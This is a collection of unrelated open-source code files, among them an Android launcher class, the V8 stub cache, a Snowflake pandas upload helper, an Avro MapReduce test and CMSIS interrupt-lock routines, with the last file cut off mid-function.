function()
seconds = time.time() - startTime
sys.stdout = stdout
timings.append(seconds)
mean = statistics.mean(timings)
if i < 10 or i % 10 == 9:
print("{} {:3.2f} {:3.2f}".format(
1 + i, mean,
statistics.stdev(timings, mean) if i > 1 else 0))
| 1,142 |
1,546 | <filename>quickstep/src/com/android/quickstep/FallbackActivityInterface.java<gh_stars>1000+
/*
* Copyright (C) 2019 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.quickstep;
import static com.android.launcher3.config.FeatureFlags.ENABLE_QUICKSTEP_LIVE_TILE;
import static com.android.quickstep.SysUINavigationMode.Mode.NO_BUTTON;
import static com.android.quickstep.fallback.RecentsState.BACKGROUND_APP;
import static com.android.quickstep.fallback.RecentsState.DEFAULT;
import static com.android.quickstep.fallback.RecentsState.HOME;
import android.content.Context;
import android.graphics.Rect;
import android.view.MotionEvent;
import androidx.annotation.Nullable;
import com.android.launcher3.DeviceProfile;
import com.android.launcher3.statemanager.StateManager;
import com.android.launcher3.touch.PagedOrientationHandler;
import com.android.quickstep.fallback.RecentsState;
import com.android.quickstep.util.ActivityInitListener;
import com.android.quickstep.util.AnimatorControllerWithResistance;
import com.android.quickstep.views.RecentsView;
import com.android.systemui.shared.system.RemoteAnimationTargetCompat;
import java.util.function.Consumer;
import java.util.function.Predicate;
/**
* {@link BaseActivityInterface} for recents when the default launcher is different than the
* currently running one and apps should interact with the {@link RecentsActivity} as opposed
* to the in-launcher one.
*/
public final class FallbackActivityInterface extends
BaseActivityInterface<RecentsState, RecentsActivity> {
public static final FallbackActivityInterface INSTANCE = new FallbackActivityInterface();
private FallbackActivityInterface() {
super(false, DEFAULT, BACKGROUND_APP);
}
/** 2 */
@Override
public int getSwipeUpDestinationAndLength(DeviceProfile dp, Context context, Rect outRect,
PagedOrientationHandler orientationHandler) {
calculateTaskSize(context, dp, outRect, orientationHandler);
if (dp.isVerticalBarLayout()
&& SysUINavigationMode.INSTANCE.get(context).getMode() != NO_BUTTON) {
return dp.isSeascape() ? outRect.left : (dp.widthPx - outRect.right);
} else {
return dp.heightPx - outRect.bottom;
}
}
/** 5 */
@Override
public void onAssistantVisibilityChanged(float visibility) {
// This class becomes active when the screen is locked.
// Rather than having it handle assistant visibility changes, the assistant visibility is
// set to zero prior to this class becoming active.
}
@Override
public void onOneHandedModeStateChanged(boolean activated) {
// Do nothing for FallbackActivityInterface
}
/** 6 */
@Override
public AnimationFactory prepareRecentsUI(RecentsAnimationDeviceState deviceState,
boolean activityVisible, Consumer<AnimatorControllerWithResistance> callback) {
notifyRecentsOfOrientation(deviceState.getRotationTouchHelper());
DefaultAnimationFactory factory = new DefaultAnimationFactory(callback);
factory.initUI();
return factory;
}
@Override
public ActivityInitListener createActivityInitListener(
Predicate<Boolean> onInitListener) {
return new ActivityInitListener<>((activity, alreadyOnHome) ->
onInitListener.test(alreadyOnHome), RecentsActivity.ACTIVITY_TRACKER);
}
@Nullable
@Override
public RecentsActivity getCreatedActivity() {
return RecentsActivity.ACTIVITY_TRACKER.getCreatedActivity();
}
@Nullable
@Override
public RecentsView getVisibleRecentsView() {
RecentsActivity activity = getCreatedActivity();
if (activity != null) {
if (activity.hasBeenResumed()
|| (ENABLE_QUICKSTEP_LIVE_TILE.get() && isInLiveTileMode())) {
return activity.getOverviewPanel();
}
}
return null;
}
@Override
public boolean switchToRecentsIfVisible(Runnable onCompleteCallback) {
return false;
}
@Override
public Rect getOverviewWindowBounds(Rect homeBounds, RemoteAnimationTargetCompat target) {
// TODO: Remove this once b/77875376 is fixed
return target.screenSpaceBounds;
}
@Override
public boolean allowMinimizeSplitScreen() {
// TODO: Remove this once b/77875376 is fixed
return false;
}
@Override
public boolean deferStartingActivity(RecentsAnimationDeviceState deviceState, MotionEvent ev) {
// In non-gesture mode, user might be clicking on the home button which would directly
// start the home activity instead of going through recents. In that case, defer starting
// recents until we are sure it is a gesture.
return !deviceState.isFullyGesturalNavMode()
|| super.deferStartingActivity(deviceState, ev);
}
@Override
public void onExitOverview(RotationTouchHelper deviceState, Runnable exitRunnable) {
final StateManager<RecentsState> stateManager = getCreatedActivity().getStateManager();
if (stateManager.getState() == HOME) {
exitRunnable.run();
notifyRecentsOfOrientation(deviceState);
return;
}
stateManager.addStateListener(
new StateManager.StateListener<RecentsState>() {
@Override
public void onStateTransitionComplete(RecentsState toState) {
// Are we going from Recents to Workspace?
if (toState == HOME) {
exitRunnable.run();
notifyRecentsOfOrientation(deviceState);
stateManager.removeStateListener(this);
}
}
});
}
@Override
public boolean isInLiveTileMode() {
RecentsActivity activity = getCreatedActivity();
return activity != null && activity.getStateManager().getState() == DEFAULT &&
activity.isStarted();
}
@Override
public void onLaunchTaskFailed() {
// TODO: probably go back to overview instead.
RecentsActivity activity = getCreatedActivity();
if (activity == null) {
return;
}
activity.<RecentsView>getOverviewPanel().startHome();
}
@Override
public RecentsState stateFromGestureEndTarget(GestureState.GestureEndTarget endTarget) {
switch (endTarget) {
case RECENTS:
return DEFAULT;
case NEW_TASK:
case LAST_TASK:
return BACKGROUND_APP;
case HOME:
default:
return HOME;
}
}
private void notifyRecentsOfOrientation(RotationTouchHelper rotationTouchHelper) {
// reset layout on swipe to home
RecentsView recentsView = getCreatedActivity().getOverviewPanel();
recentsView.setLayoutRotation(rotationTouchHelper.getCurrentActiveRotation(),
rotationTouchHelper.getDisplayRotation());
}
@Override
protected int getOverviewScrimColorForState(RecentsActivity activity, RecentsState state) {
return state.getScrimColor(activity);
}
}
| 2,925 |
348 | {"nom":"Lalanne","circ":"2ème circonscription","dpt":"Gers","inscrits":105,"abs":50,"votants":55,"blancs":3,"nuls":4,"exp":48,"res":[{"nuance":"SOC","nom":"<NAME>","voix":25},{"nuance":"REM","nom":"<NAME>","voix":23}]} | 89 |
942 | #include "TBackgroundProcessHandler"
#include "TWebApplication"
/*!
\class TBackgroundProcessHandler
\brief The TBackgroundProcessHandler class is used to handle events of a backgound process.
*/
TBackgroundProcessHandler::TBackgroundProcessHandler(QObject *parent) :
QObject(parent),
TDatabaseContext()
{
moveToThread(Tf::app()->databaseContextMainThread());
}
bool TBackgroundProcessHandler::autoDelete() const
{
return _autoDelete;
}
void TBackgroundProcessHandler::setAutoDelete(bool autoDelete)
{
_autoDelete = autoDelete;
}
void TBackgroundProcessHandler::deleteAutoDeleteHandler()
{
if (_autoDelete) {
deleteLater();
}
}
| 212 |
2,571 | // ***************************************************************
// Copyright (c) 2021
// <NAME> <<EMAIL>>.
// <NAME> <<EMAIL>>.
// All Rights Reserved.
// This file is subject to the terms and conditions defined in
// file 'LICENSE.txt', which is part of this source code package.
// ***************************************************************
#pragma once
#include "op.h"
namespace jittor {
struct MpiReduceOp : Op {
Var* x, * y;
NanoString op;
int root;
/**
Mpi Reduce Operator uses the operator [op] to reduce variable [x] in all MPI nodes and send to the [root] MPI node.
Args:
* x: variable to be reduced.
* op: 'sum' or 'add' means sum all [x], 'mean' means average all [x]. Default: 'add'.
* root: ID of MPI node to output. Default: 0.
*/
MpiReduceOp(Var* x, NanoString op=ns_add, int root=0);
void infer_shape() override;
const char* name() const override { return "mpi_reduce"; }
VarPtr grad(Var* out, Var* dout, Var* v, int v_index) override;
DECLARE_jit_run;
};
} // jittor | 378 |
310 | package org.seasar.doma.internal.apt.validator;
import java.util.Optional;
import java.util.OptionalDouble;
import java.util.OptionalInt;
import java.util.OptionalLong;
import org.seasar.doma.GeneratedValue;
import org.seasar.doma.GenerationType;
import org.seasar.doma.Id;
import org.seasar.doma.SequenceGenerator;
@SuppressWarnings("OptionalUsedAsFieldOrParameterType")
public class Person {
@Id
@GeneratedValue(strategy = GenerationType.SEQUENCE)
@SequenceGenerator(sequence = "PERSON_ID")
Integer id;
Optional<String> name;
static Optional<String> staticName;
public Optional<String> getName() {
return name;
}
public static Optional<String> getStaticName() {
return staticName;
}
OptionalInt age;
static OptionalInt staticAge;
public OptionalInt getAge() {
return age;
}
public static OptionalInt getStaticAge() {
return staticAge;
}
OptionalLong salary;
OptionalDouble temperature;
}
| 304 |
20,995 | // Copyright 2012 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/ic/stub-cache.h"
#include "src/ast/ast.h"
#include "src/base/bits.h"
#include "src/heap/heap-inl.h" // For InYoungGeneration().
#include "src/ic/ic-inl.h"
#include "src/logging/counters.h"
#include "src/objects/tagged-value-inl.h"
namespace v8 {
namespace internal {
StubCache::StubCache(Isolate* isolate) : isolate_(isolate) {
// Ensure the nullptr (aka Smi::zero()) which StubCache::Get() returns
// when the entry is not found is not considered as a handler.
DCHECK(!IC::IsHandler(MaybeObject()));
}
void StubCache::Initialize() {
DCHECK(base::bits::IsPowerOfTwo(kPrimaryTableSize));
DCHECK(base::bits::IsPowerOfTwo(kSecondaryTableSize));
Clear();
}
// Hash algorithm for the primary table. This algorithm is replicated in
// the AccessorAssembler. Returns an index into the table that
// is scaled by 1 << kCacheIndexShift.
int StubCache::PrimaryOffset(Name name, Map map) {
// Compute the hash of the name (use entire hash field).
DCHECK(name.HasHashCode());
uint32_t field = name.raw_hash_field();
// Using only the low bits in 64-bit mode is unlikely to increase the
// risk of collision even if the heap is spread over an area larger than
// 4Gb (and not at all if it isn't).
uint32_t map_low32bits =
static_cast<uint32_t>(map.ptr() ^ (map.ptr() >> kMapKeyShift));
// Base the offset on a simple combination of name and map.
uint32_t key = map_low32bits + field;
return key & ((kPrimaryTableSize - 1) << kCacheIndexShift);
}
// Hash algorithm for the secondary table. This algorithm is replicated in
// assembler. This hash should be sufficiently different from the primary one
// in order to avoid collisions for minified code with short names.
// Returns an index into the table that is scaled by 1 << kCacheIndexShift.
int StubCache::SecondaryOffset(Name name, Map old_map) {
uint32_t name_low32bits = static_cast<uint32_t>(name.ptr());
uint32_t map_low32bits = static_cast<uint32_t>(old_map.ptr());
uint32_t key = (map_low32bits + name_low32bits);
key = key + (key >> kSecondaryKeyShift);
return key & ((kSecondaryTableSize - 1) << kCacheIndexShift);
}
int StubCache::PrimaryOffsetForTesting(Name name, Map map) {
return PrimaryOffset(name, map);
}
int StubCache::SecondaryOffsetForTesting(Name name, Map map) {
return SecondaryOffset(name, map);
}
#ifdef DEBUG
namespace {
bool CommonStubCacheChecks(StubCache* stub_cache, Name name, Map map,
MaybeObject handler) {
// Validate that the name and handler do not move on scavenge, and that we
// can use identity checks instead of structural equality checks.
DCHECK(!Heap::InYoungGeneration(name));
DCHECK(!Heap::InYoungGeneration(handler));
DCHECK(name.IsUniqueName());
if (handler->ptr() != kNullAddress) DCHECK(IC::IsHandler(handler));
return true;
}
} // namespace
#endif
void StubCache::Set(Name name, Map map, MaybeObject handler) {
DCHECK(CommonStubCacheChecks(this, name, map, handler));
// Compute the primary entry.
int primary_offset = PrimaryOffset(name, map);
Entry* primary = entry(primary_, primary_offset);
MaybeObject old_handler(
TaggedValue::ToMaybeObject(isolate(), primary->value));
// If the primary entry has useful data in it, we retire it to the
// secondary cache before overwriting it.
if (old_handler != MaybeObject::FromObject(
isolate()->builtins()->code(Builtin::kIllegal)) &&
!primary->map.IsSmi()) {
Map old_map =
Map::cast(StrongTaggedValue::ToObject(isolate(), primary->map));
Name old_name =
Name::cast(StrongTaggedValue::ToObject(isolate(), primary->key));
int secondary_offset = SecondaryOffset(old_name, old_map);
Entry* secondary = entry(secondary_, secondary_offset);
*secondary = *primary;
}
// Update primary cache.
primary->key = StrongTaggedValue(name);
primary->value = TaggedValue(handler);
primary->map = StrongTaggedValue(map);
isolate()->counters()->megamorphic_stub_cache_updates()->Increment();
}
MaybeObject StubCache::Get(Name name, Map map) {
DCHECK(CommonStubCacheChecks(this, name, map, MaybeObject()));
int primary_offset = PrimaryOffset(name, map);
Entry* primary = entry(primary_, primary_offset);
if (primary->key == name && primary->map == map) {
return TaggedValue::ToMaybeObject(isolate(), primary->value);
}
int secondary_offset = SecondaryOffset(name, map);
Entry* secondary = entry(secondary_, secondary_offset);
if (secondary->key == name && secondary->map == map) {
return TaggedValue::ToMaybeObject(isolate(), secondary->value);
}
return MaybeObject();
}
void StubCache::Clear() {
MaybeObject empty =
MaybeObject::FromObject(isolate_->builtins()->code(Builtin::kIllegal));
Name empty_string = ReadOnlyRoots(isolate()).empty_string();
for (int i = 0; i < kPrimaryTableSize; i++) {
primary_[i].key = StrongTaggedValue(empty_string);
primary_[i].map = StrongTaggedValue(Smi::zero());
primary_[i].value = TaggedValue(empty);
}
for (int j = 0; j < kSecondaryTableSize; j++) {
secondary_[j].key = StrongTaggedValue(empty_string);
secondary_[j].map = StrongTaggedValue(Smi::zero());
secondary_[j].value = TaggedValue(empty);
}
}
} // namespace internal
} // namespace v8
| 1,807 |
998 | <gh_stars>100-1000
// Copyright 2021 Phyronnaz
#pragma once
#include "CoreMinimal.h"
#include "VoxelValue.h"
#include "VoxelMinimal.h"
#include "VoxelDiff.h"
#include "UObject/Object.h"
#include "VoxelMultiplayerInterface.generated.h"
struct FVoxelMaterial;
struct FVoxelCompressedWorldSaveImpl;
class IVoxelMultiplayerClient;
class IVoxelMultiplayerServer;
UCLASS(Abstract, BlueprintType)
class VOXEL_API UVoxelMultiplayerInterface : public UObject
{
GENERATED_BODY()
public:
};
| 204 |
311 | <reponame>timgraham/snowflake-connector-python<gh_stars>100-1000
#
# Copyright (c) 2012-2021 Snowflake Computing Inc. All rights reserved.
#
import os
import random
import string
from functools import partial
from logging import getLogger
from tempfile import TemporaryDirectory
from typing import (
TYPE_CHECKING,
Callable,
Iterable,
Iterator,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
)
from snowflake.connector import ProgrammingError
from snowflake.connector.options import pandas
if TYPE_CHECKING: # pragma: no cover
from .connection import SnowflakeConnection
try:
import sqlalchemy
except ImportError:
sqlalchemy = None
T = TypeVar("T", bound=Sequence)
logger = getLogger(__name__)
def chunk_helper(lst: T, n: int) -> Iterator[Tuple[int, T]]:
"""Helper generator to chunk a sequence efficiently with current index like if enumerate was called on sequence."""
for i in range(0, len(lst), n):
yield int(i / n), lst[i : i + n]
def write_pandas(
conn: "SnowflakeConnection",
df: "pandas.DataFrame",
table_name: str,
database: Optional[str] = None,
schema: Optional[str] = None,
chunk_size: Optional[int] = None,
compression: str = "gzip",
on_error: str = "abort_statement",
parallel: int = 4,
quote_identifiers: bool = True,
) -> Tuple[
bool,
int,
int,
Sequence[
Tuple[
str,
str,
int,
int,
int,
int,
Optional[str],
Optional[int],
Optional[int],
Optional[str],
]
],
]:
"""Allows users to most efficiently write back a pandas DataFrame to Snowflake.
It works by dumping the DataFrame into Parquet files, uploading them and finally copying their data into the table.
Returns whether all files were ingested correctly, number of chunks uploaded, and number of rows ingested
with all of the COPY INTO command's output for debugging purposes.
Example usage:
import pandas
from snowflake.connector.pandas_tools import write_pandas
df = pandas.DataFrame([('Mark', 10), ('Luke', 20)], columns=['name', 'balance'])
success, nchunks, nrows, _ = write_pandas(cnx, df, 'customers')
Args:
conn: Connection to be used to communicate with Snowflake.
df: Dataframe we'd like to write back.
table_name: Table name where we want to insert into.
database: Database schema and table is in, if not provided the default one will be used (Default value = None).
schema: Schema table is in, if not provided the default one will be used (Default value = None).
chunk_size: Number of elements to be inserted once, if not provided all elements will be dumped once
(Default value = None).
compression: The compression used on the Parquet files, can only be gzip, or snappy. Gzip gives supposedly a
better compression, while snappy is faster. Use whichever is more appropriate (Default value = 'gzip').
on_error: Action to take when COPY INTO statements fail, default follows documentation at:
https://docs.snowflake.com/en/sql-reference/sql/copy-into-table.html#copy-options-copyoptions
(Default value = 'abort_statement').
parallel: Number of threads to be used when uploading chunks, default follows documentation at:
https://docs.snowflake.com/en/sql-reference/sql/put.html#optional-parameters (Default value = 4).
quote_identifiers: By default, identifiers, specifically database, schema, table and column names
(from df.columns) will be quoted. If set to False, identifiers are passed on to Snowflake without quoting.
I.e. identifiers will be coerced to uppercase by Snowflake. (Default value = True)
Returns:
Returns the COPY INTO command's results to verify ingestion in the form of a tuple of whether all chunks were
ingested correctly, # of chunks, # of ingested rows, and ingest's output.
"""
if database is not None and schema is None:
raise ProgrammingError(
"Schema has to be provided to write_pandas when a database is provided"
)
# This dictionary maps the compression algorithm to Snowflake put copy into command type
# https://docs.snowflake.com/en/sql-reference/sql/copy-into-table.html#type-parquet
compression_map = {"gzip": "auto", "snappy": "snappy"}
if compression not in compression_map.keys():
raise ProgrammingError(
"Invalid compression '{}', only acceptable values are: {}".format(
compression, compression_map.keys()
)
)
if quote_identifiers:
location = (
(('"' + database + '".') if database else "")
+ (('"' + schema + '".') if schema else "")
+ ('"' + table_name + '"')
)
else:
location = (
(database + "." if database else "")
+ (schema + "." if schema else "")
+ (table_name)
)
if chunk_size is None:
chunk_size = len(df)
cursor = conn.cursor()
stage_name = None # Forward declaration
while True:
try:
stage_name = "".join(
random.choice(string.ascii_lowercase) for _ in range(5)
)
create_stage_sql = (
"create temporary stage /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
'"{stage_name}"'
).format(stage_name=stage_name)
logger.debug("creating stage with '{}'".format(create_stage_sql))
cursor.execute(create_stage_sql, _is_internal=True).fetchall()
break
except ProgrammingError as pe:
if pe.msg.endswith("already exists."):
continue
raise
with TemporaryDirectory() as tmp_folder:
for i, chunk in chunk_helper(df, chunk_size):
chunk_path = os.path.join(tmp_folder, "file{}.txt".format(i))
# Dump chunk into parquet file
chunk.to_parquet(chunk_path, compression=compression)
# Upload parquet file
upload_sql = (
"PUT /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
"'file://{path}' @\"{stage_name}\" PARALLEL={parallel}"
).format(
path=chunk_path.replace("\\", "\\\\").replace("'", "\\'"),
stage_name=stage_name,
parallel=parallel,
)
logger.debug("uploading files with '{}'".format(upload_sql))
cursor.execute(upload_sql, _is_internal=True)
# Remove chunk file
os.remove(chunk_path)
if quote_identifiers:
columns = '"' + '","'.join(list(df.columns)) + '"'
else:
columns = ",".join(list(df.columns))
# in Snowflake, all parquet data is stored in a single column, $1, so we must select columns explicitly
# see (https://docs.snowflake.com/en/user-guide/script-data-load-transform-parquet.html)
if quote_identifiers:
parquet_columns = "$1:" + ",$1:".join(f'"{c}"' for c in df.columns)
else:
parquet_columns = "$1:" + ",$1:".join(df.columns)
copy_into_sql = (
"COPY INTO {location} /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
"({columns}) "
'FROM (SELECT {parquet_columns} FROM @"{stage_name}") '
"FILE_FORMAT=(TYPE=PARQUET COMPRESSION={compression}) "
"PURGE=TRUE ON_ERROR={on_error}"
).format(
location=location,
columns=columns,
parquet_columns=parquet_columns,
stage_name=stage_name,
compression=compression_map[compression],
on_error=on_error,
)
logger.debug("copying into with '{}'".format(copy_into_sql))
copy_results = cursor.execute(copy_into_sql, _is_internal=True).fetchall()
cursor.close()
return (
all(e[1] == "LOADED" for e in copy_results),
len(copy_results),
sum(int(e[3]) for e in copy_results),
copy_results,
)
def make_pd_writer(
quote_identifiers: bool = True,
) -> Callable[
[
"pandas.io.sql.SQLTable",
Union["sqlalchemy.engine.Engine", "sqlalchemy.engine.Connection"],
Iterable,
Iterable,
],
None,
]:
"""This returns a pd_writer with the desired arguments.
Example usage:
import pandas as pd
from snowflake.connector.pandas_tools import pd_writer
sf_connector_version_df = pd.DataFrame([('snowflake-connector-python', '1.0')], columns=['NAME', 'NEWEST_VERSION'])
sf_connector_version_df.to_sql('driver_versions', engine, index=False, method=make_pd_writer())
# to use quote_identifiers=False,
from functools import partial
sf_connector_version_df.to_sql(
'driver_versions', engine, index=False, method=make_pd_writer(quote_identifiers=False)))
Args:
quote_identifiers: if True (default), the pd_writer will pass quote identifiers to Snowflake.
If False, the created pd_writer will not quote identifiers (and typically coerced to uppercase by Snowflake)
"""
return partial(pd_writer, quote_identifiers=quote_identifiers)
def pd_writer(
table: "pandas.io.sql.SQLTable",
conn: Union["sqlalchemy.engine.Engine", "sqlalchemy.engine.Connection"],
keys: Iterable,
data_iter: Iterable,
quote_identifiers: bool = True,
) -> None:
"""This is a wrapper on top of write_pandas to make it compatible with to_sql method in pandas.
Example usage:
import pandas as pd
from snowflake.connector.pandas_tools import pd_writer
sf_connector_version_df = pd.DataFrame([('snowflake-connector-python', '1.0')], columns=['NAME', 'NEWEST_VERSION'])
sf_connector_version_df.to_sql('driver_versions', engine, index=False, method=pd_writer)
# to use quote_identifiers=False, see `make_pd_writer`
Args:
table: Pandas package's table object.
conn: SQLAlchemy engine object to talk to Snowflake.
keys: Column names that we are trying to insert.
data_iter: Iterator over the rows.
quote_identifiers: if True (default), quote identifiers passed to Snowflake. If False, identifiers are not
quoted (and typically coerced to uppercase by Snowflake)
"""
sf_connection = conn.connection.connection
df = pandas.DataFrame(data_iter, columns=keys)
write_pandas(
conn=sf_connection,
df=df,
# Note: Our sqlalchemy connector creates tables case insensitively
table_name=table.name.upper(),
schema=table.schema,
quote_identifiers=quote_identifiers,
)
| 4,484 |
1,960 | <filename>lang/java/mapred/src/test/java/org/apache/avro/mapred/TestWordCount.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.avro.mapred;
import static org.junit.Assert.assertEquals;
import java.io.File;
import java.io.IOException;
import java.util.StringTokenizer;
import org.apache.avro.Schema;
import org.apache.avro.util.Utf8;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.NullWritable;
import org.apache.hadoop.mapred.FileInputFormat;
import org.apache.hadoop.mapred.FileOutputFormat;
import org.apache.hadoop.mapred.FileSplit;
import org.apache.hadoop.mapred.JobClient;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.Reporter;
import org.junit.ClassRule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
public class TestWordCount {
@ClassRule
public static TemporaryFolder INPUT_DIR = new TemporaryFolder();
@ClassRule
public static TemporaryFolder OUTPUT_DIR = new TemporaryFolder();
public static class MapImpl extends AvroMapper<Utf8, Pair<Utf8, Long>> {
@Override
public void map(Utf8 text, AvroCollector<Pair<Utf8, Long>> collector, Reporter reporter) throws IOException {
StringTokenizer tokens = new StringTokenizer(text.toString());
while (tokens.hasMoreTokens())
collector.collect(new Pair<>(new Utf8(tokens.nextToken()), 1L));
}
}
public static class ReduceImpl extends AvroReducer<Utf8, Long, Pair<Utf8, Long>> {
@Override
public void reduce(Utf8 word, Iterable<Long> counts, AvroCollector<Pair<Utf8, Long>> collector, Reporter reporter)
throws IOException {
long sum = 0;
for (long count : counts)
sum += count;
collector.collect(new Pair<>(word, sum));
}
}
@Test
public void runTestsInOrder() throws Exception {
String pathOut = OUTPUT_DIR.getRoot().getPath();
testJob(pathOut);
testProjection(pathOut);
}
@SuppressWarnings("deprecation")
public void testJob(String pathOut) throws Exception {
JobConf job = new JobConf();
String pathIn = INPUT_DIR.getRoot().getPath();
WordCountUtil.writeLinesFile(pathIn + "/lines.avro");
Path outputPath = new Path(pathOut);
outputPath.getFileSystem(job).delete(outputPath);
job.setJobName("wordcount");
AvroJob.setInputSchema(job, Schema.create(Schema.Type.STRING));
AvroJob.setOutputSchema(job, new Pair<Utf8, Long>(new Utf8(""), 0L).getSchema());
AvroJob.setMapperClass(job, MapImpl.class);
AvroJob.setCombinerClass(job, ReduceImpl.class);
AvroJob.setReducerClass(job, ReduceImpl.class);
FileInputFormat.setInputPaths(job, new Path(pathIn));
FileOutputFormat.setOutputPath(job, new Path(pathOut));
FileOutputFormat.setCompressOutput(job, true);
WordCountUtil.setMeta(job);
JobClient.runJob(job);
WordCountUtil.validateCountsFile(new File(pathOut, "part-00000.avro"));
}
@SuppressWarnings("deprecation")
public void testProjection(String inputPathString) throws Exception {
JobConf job = new JobConf();
Integer defaultRank = -1;
String jsonSchema = "{\"type\":\"record\"," + "\"name\":\"org.apache.avro.mapred.Pair\"," + "\"fields\": [ "
+ "{\"name\":\"rank\", \"type\":\"int\", \"default\": -1}," + "{\"name\":\"value\", \"type\":\"long\"}" + "]}";
Schema readerSchema = Schema.parse(jsonSchema);
AvroJob.setInputSchema(job, readerSchema);
Path inputPath = new Path(inputPathString + "/part-00000.avro");
FileStatus fileStatus = FileSystem.get(job).getFileStatus(inputPath);
FileSplit fileSplit = new FileSplit(inputPath, 0, fileStatus.getLen(), job);
AvroRecordReader<Pair<Integer, Long>> recordReader = new AvroRecordReader<>(job, fileSplit);
AvroWrapper<Pair<Integer, Long>> inputPair = new AvroWrapper<>(null);
NullWritable ignore = NullWritable.get();
long sumOfCounts = 0;
long numOfCounts = 0;
while (recordReader.next(inputPair, ignore)) {
assertEquals(inputPair.datum().get(0), defaultRank);
sumOfCounts += (Long) inputPair.datum().get(1);
numOfCounts++;
}
assertEquals(numOfCounts, WordCountUtil.COUNTS.size());
long actualSumOfCounts = 0;
for (Long count : WordCountUtil.COUNTS.values()) {
actualSumOfCounts += count;
}
assertEquals(sumOfCounts, actualSumOfCounts);
}
}
| 1,806 |
4,538 | <filename>hardware/chip/haas1000/drivers/platform/cmsis/inc/cmsis.h
/* mbed Microcontroller Library - CMSIS
* Copyright (C) 2009-2011 ARM Limited. All rights reserved.
*
* A generic CMSIS include header, pulling in LPC11U24 specifics
*/
#ifndef MBED_CMSIS_H
#define MBED_CMSIS_H
#ifdef __cplusplus
extern "C" {
#endif
#include "plat_addr_map.h"
#include _TO_STRING(CONCAT_SUFFIX(CHIP_ID_LITERAL, h))
#define IRQ_PRIORITY_REALTIME 0
#define IRQ_PRIORITY_HIGHPLUSPLUS 1
#define IRQ_PRIORITY_HIGHPLUS 2
#define IRQ_PRIORITY_HIGH 3
#define IRQ_PRIORITY_ABOVENORMAL 4
#define IRQ_PRIORITY_NORMAL 5
#define IRQ_PRIORITY_BELOWNORMAL 6
#define IRQ_PRIORITY_LOW 7
#ifdef __ARM_ARCH_ISA_ARM
#define IRQ_LOCK_MASK (CPSR_I_Msk | CPSR_F_Msk)
#else
#define NVIC_USER_IRQ_OFFSET 16
#define NVIC_NUM_VECTORS (NVIC_USER_IRQ_OFFSET + USER_IRQn_QTY)
#endif
#ifndef __ASSEMBLER__
#ifdef __ARMCC_VERSION
// Stupid armclang
#undef __SSAT
#define __SSAT(ARG1,ARG2) \
__extension__ \
({ \
int32_t __RES, __ARG1 = (ARG1); \
__ASM ("ssat %0, %1, %2" : "=r" (__RES) : "I" (ARG2), "r" (__ARG1) ); \
__RES; \
})
#endif
__STATIC_FORCEINLINE uint32_t int_lock_global(void)
{
#ifdef __ARM_ARCH_ISA_ARM
uint32_t cpsr = __get_CPSR();
uint32_t st = cpsr & IRQ_LOCK_MASK;
if (st != IRQ_LOCK_MASK) {
cpsr |= IRQ_LOCK_MASK;
__set_CPSR(cpsr);
}
return st;
#else
uint32_t pri = __get_PRIMASK();
if ((pri & 0x1) == 0) {
__disable_irq();
}
return pri;
#endif
}
__STATIC_FORCEINLINE void int_unlock_global(uint32_t pri)
{
#ifdef __ARM_ARCH_ISA_ARM
if (pri != IRQ_LOCK_MASK) {
uint32_t cpsr = __get_CPSR();
cpsr = (cpsr & ~IRQ_LOCK_MASK) | pri;
__set_CPSR(cpsr);
}
#else
if ((pri & 0x1) == 0) {
__enable_irq();
}
#endif
}
#if defined(RTOS) && defined(__ARM_ARCH_ISA_ARM)
extern uint32_t int_lock(void);
extern void int_unlock(uint32_t pri);
#else
__STATIC_FORCEINLINE uint32_t int_lock(void)
{
#ifdef INT_LOCK_EXCEPTION
#ifdef __ARM_ARCH_ISA_ARM
uint32_t mask = GIC_GetInterfacePriorityMask();
// Only allow IRQs with priority IRQ_PRIORITY_HIGHPLUSPLUS and IRQ_PRIORITY_REALTIME
GIC_SetInterfacePriorityMask(((IRQ_PRIORITY_HIGHPLUS << (8 - __NVIC_PRIO_BITS)) & (uint32_t)0xFFUL));
return mask;
#else
uint32_t pri = __get_BASEPRI();
// Only allow IRQs with priority IRQ_PRIORITY_HIGHPLUSPLUS and IRQ_PRIORITY_REALTIME
__set_BASEPRI(((IRQ_PRIORITY_HIGHPLUS << (8 - __NVIC_PRIO_BITS)) & (uint32_t)0xFFUL));
return pri;
#endif
#else
return int_lock_global();
#endif
}
__STATIC_FORCEINLINE void int_unlock(uint32_t pri)
{
#ifdef INT_LOCK_EXCEPTION
#ifdef __ARM_ARCH_ISA_ARM
GIC_SetInterfacePriorityMask(pri);
#else
__set_BASEPRI(pri);
#endif
#else
int_unlock_global(pri);
#endif
}
#endif
__STATIC_FORCEINLINE int in_isr(void)
{
#ifdef __ARM_ARCH_ISA_ARM
#ifdef KERNEL_RHINO
extern int rhino_in_isr(void);
return rhino_in_isr();
#else
uint32_t mode = __get_mode();
return mode != CPSR_M_USR && mode != CPSR_M_SYS;
#endif
#else
#ifdef KERNEL_FREERTOS
extern int osIsIRQ();
return osIsIRQ();
#else
return __get_IPSR() != 0;
#endif
#endif
}
__STATIC_FORCEINLINE int32_t ftoi_nearest(float f)
